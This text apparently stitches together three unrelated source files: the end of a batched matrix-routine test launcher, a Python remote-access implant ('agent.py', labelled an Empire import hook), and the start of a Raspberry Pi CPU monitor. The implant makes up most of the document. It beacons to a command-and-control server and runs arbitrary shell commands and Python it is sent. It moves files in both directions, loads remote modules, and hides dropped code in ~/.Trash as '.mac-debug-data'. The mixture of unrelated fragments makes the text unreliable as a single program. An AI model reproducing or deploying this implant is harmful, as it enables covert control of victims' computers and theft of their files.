parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_TRMM
if (TEST_BATCH_TRMM == 1):
variants = ['-L -NN -DN',
'-L -TN -DN',
# '-SL -U -NN -DN',
# '-SL -U -TN -DN',
# '-SR -L -NN -DN',
# '-SR -L -TN -DN',
# '-SR -U -NN -DN',
# '-SR -U -TN -DN'
]
programs = ['test_strmm_batch',
'test_dtrmm_batch',
'test_ctrmm_batch',
'test_ztrmm_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_TRSM
if (TEST_BATCH_TRSM == 1):
variants = ['-SL -L -NN -DN',
'-SL -L -TN -DN',
# '-SL -U -NN -DN',
# '-SL -U -TN -DN',
'-SR -L -NN -DN',
'-SR -L -TN -DN',
# '-SR -U -NN -DN',
# '-SR -U -TN -DN'
]
programs = ['test_strsm_batch',
'test_dtrsm_batch',
'test_ctrsm_batch',
'test_ztrsm_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_SYRK
if (TEST_BATCH_SYRK == 1):
variants = ['-L -NN',
'-L -TN',
# '-U -NN',
# '-U -TN',
]
programs = ['test_ssyrk_batch',
'test_dsyrk_batch',
'test_csyrk_batch',
'test_zsyrk_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_POTRF
if (TEST_BATCH_POTRF == 1):
variants = ['-L',
# '-U',
]
programs = ['test_spotrf_batch',
'test_dpotrf_batch',
'test_cpotrf_batch',
'test_zpotrf_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_LAUUM
if (TEST_BATCH_LAUUM == 1):
variants = ['-L',
# '-U',
]
programs = ['test_slauum_batch',
'test_dlauum_batch',
'test_clauum_batch',
'test_zlauum_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_TRTRI
if (TEST_BATCH_TRTRI == 1):
variants = ['-L -DN',
# '-L -DU',
# '-U -DN',
# '-U -DU',
]
programs = ['test_strtri_batch',
'test_dtrtri_batch',
'test_ctrtri_batch',
'test_ztrtri_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_TRTRI
if (TEST_BATCH_POTRS == 1):
variants = ['-SR -L',
# '-SR -U',
# '-SL -L',
# '-SL -U',
]
programs = ['test_spotrs_batch',
'test_dpotrs_batch',
'test_cpotrs_batch',
'test_zpotrs_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_POTRI
if (TEST_BATCH_POTRI == 1):
variants = ['-L',
# '-U',
]
programs = ['test_spotri_batch',
'test_dpotri_batch',
'test_cpotri_batch',
'test_zpotri_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_POTI
if (TEST_BATCH_POTI == 1):
variants = ['-L',
# '-U',
]
programs = ['test_spoti_batch',
'test_dpoti_batch',
'test_cpoti_batch',
'test_zpoti_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_POSV
if (TEST_BATCH_POSV == 1):
variants = ['-SR',
# '-SL',
]
programs = ['test_sposv_batch',
'test_dposv_batch',
'test_cposv_batch',
'test_zposv_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
|
agent.py | from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
import __future__
import struct
import time
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import trace
import shlex
import zlib
import threading
import http.server
import zipfile
import io
import imp
import marshal
import re
import shutil
import pwd
import socket
import math
import stat
import grp
from stat import S_ISREG, ST_CTIME, ST_MODE
from os.path import expanduser
from io import StringIO
from threading import Thread
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" %(headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if(isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8','ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L',len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
def parse_task_packet(packet, offset=0):
"""
Parse a result packet-
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
Returns a tuple with (responseName, length, data, remainingData)
Returns a tuple with (responseName, totalPackets, packetNum, resultID, length, data, remainingData)
"""
# print "parse_task_packet"
if(isinstance(packet, str)):
packet = packet.encode('UTF-8')
try:
packetType = struct.unpack('=H', packet[0+offset:2+offset])[0]
totalPacket = struct.unpack('=H', packet[2+offset:4+offset])[0]
packetNum = struct.unpack('=H', packet[4+offset:6+offset])[0]
resultID = struct.unpack('=H', packet[6+offset:8+offset])[0]
length = struct.unpack('=L', packet[8+offset:12+offset])[0]
packetData = packet[12+offset:12+offset+length]
remainingData = packet[12+offset+length:]
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:",e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
try:
# aes_decrypt_and_verify is in stager.py
tasking = aes_decrypt_and_verify(key, data)
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking, offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = ""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:",e)
pass
def process_packet(packetType, data, resultID):
if(isinstance(data, bytes)):
data = data.decode('UTF-8')
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
if not os.path.isdir(objPath):
fileList.append(objPath)
else:
# recursive dir listing
for folder, subs, files in os.walk(objPath):
for filename in files:
#dont care about symlinks
if os.path.exists(objPath):
fileList.append(objPath + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart)
partData = "%s|%s|%s" %(partIndex, filePath, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1,jitter)
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(0, "[!] WARNING: File upload failed crc32 check during decompressing!.", resultID))
send_message(build_response_packet(0, "[!] HEADER: Start crc32: %s -- Received crc32: %s -- Crc32 pass: %s!." %(dec_data['header_crc32'],dec_data['dec_crc32'],dec_data['crc32_check']), resultID))
f = open(filePath, 'ab')
f.write(dec_data['data'])
f.close()
send_message(build_response_packet(42, "[*] Upload of %s successful" %(filePath), resultID))
except Exception as e:
sendec_datadMessage(build_response_packet(0, "[!] Error in writing file %s during upload: %s" %(filePath, str(e)), resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" %(x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" %(data), resultID)
elif packetType == 100:
# dynamic code execution, wait for output, don't save outputPicl
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
c = compress()
start_crc32 = c.crc32_data(buffer.getvalue())
comp_data = c.comp_data(buffer.getvalue())
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart)
send_message(build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart, resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = str(buffer.getvalue())
send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" %(implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" %(implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "\n[*] Module path was properly removed: %s" %(implantPath)
except Exception as e:
print("error removing module filed: %s" %(e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" %(e), resultID))
elif packetType == 110:
start_job(data)
send(build_response_packet(110, "job %s started" %(len(jobs)-1), resultID))
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
#base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID))
elif packetType == 122:
#base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
#view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----"+key+"----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----"+repoName+"----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
#remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" %(taskingID), resultID))
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
#check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
#Error out if we can find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
################################################
#
# misc methods
#
################################################
class compress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
cvalue = 0-9 comp value (default 6)
'''
cdata = zlib.compress(data,cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I",crc)
built_data = header + data
return built_data
class decompress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
dict with crc32 cheack and dec data string
ex. {"crc32" : true, "dec_data" : "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return { "header_crc32" : comp_crc32, "dec_crc32" : dec_crc32, "crc32_check" : crc32, "data" : dec_data }
else:
dec_data = zlib.decompress(data)
return dec_data
def agent_exit():
# exit for proper job / thread cleanup
print('exiting agent')
if len(jobs) > 0:
print('jobs still running')
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, Verbose=None):
Thread.__init__(self, group, target, name, args, kwargs, Verbose)
self._return = None
def run(self):
if self._Thread__target is not None:
self._return = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
self.run = self.__run # Force the Thread toinstall our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code)
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
# create/processPacketstart/return the thread
# call the job_func so sys data can be cpatured
codeThread = KThread(target=job_func)
codeThread.start()
jobs.append(codeThread)
def job_func():
try:
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
# now call the function required
# and capture the output via sys
method()
sys.stdout = old_stdout
dataStats_2 = mystdout.getvalue()
result = build_response_packet(110, str(dataStats_2))
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" %(e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data)
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr,user,group,mtime,fsize,unit,fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command,cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip()
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
################################################
#
# main agent functionality
#
################################################
while(True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start,end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" %(sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
# exit if we miss commnicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1,jitter)
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data == defaultResponse:
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
|
wx_connection.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import websocket
import commands
import time
import os
import threading
import sys
#f = file('/dev/null', 'w')
#sys.stderr = f
commands.getoutput("echo 18 > /sys/class/gpio/export")
commands.getoutput("echo out > /sys/class/gpio/gpio18/direction")
global mark_num
#Return % of CPU used and temperature
def get_CPU_info():
cpulog_1 = commands.getoutput("cat /proc/stat | grep 'cpu ' | awk '{print $2+$3+$4+$5+$6+$7+$8\" \"$5}'")
cpulog_1 = cpulog_1.split()
time.sleep(1)
cpulog_2 = commands.getoutput("cat /proc/stat | grep 'cpu ' | awk '{print $2+$3+$4+$5+$6+$7+$8\" \"$5}'")
cpulog_2 = cpulog_2.split()
total = float(cpulog_2[0]) - float(cpulog_1[0])
idle = float(cpulog_2[1]) - float(cpulog_1[1])
CPU_use = "%.1f" % (100 - (idle*100/total))
res = commands.getoutput('cat /sys/class/hwmon/hwmon0/device/temp1_input')
# res = "33333"
CPU_temp = "%.1f" % (float(res)/1000)
CPUinfo = "CPU||%s||%s" % (CPU_temp,CPU_use)
return CPUinfo
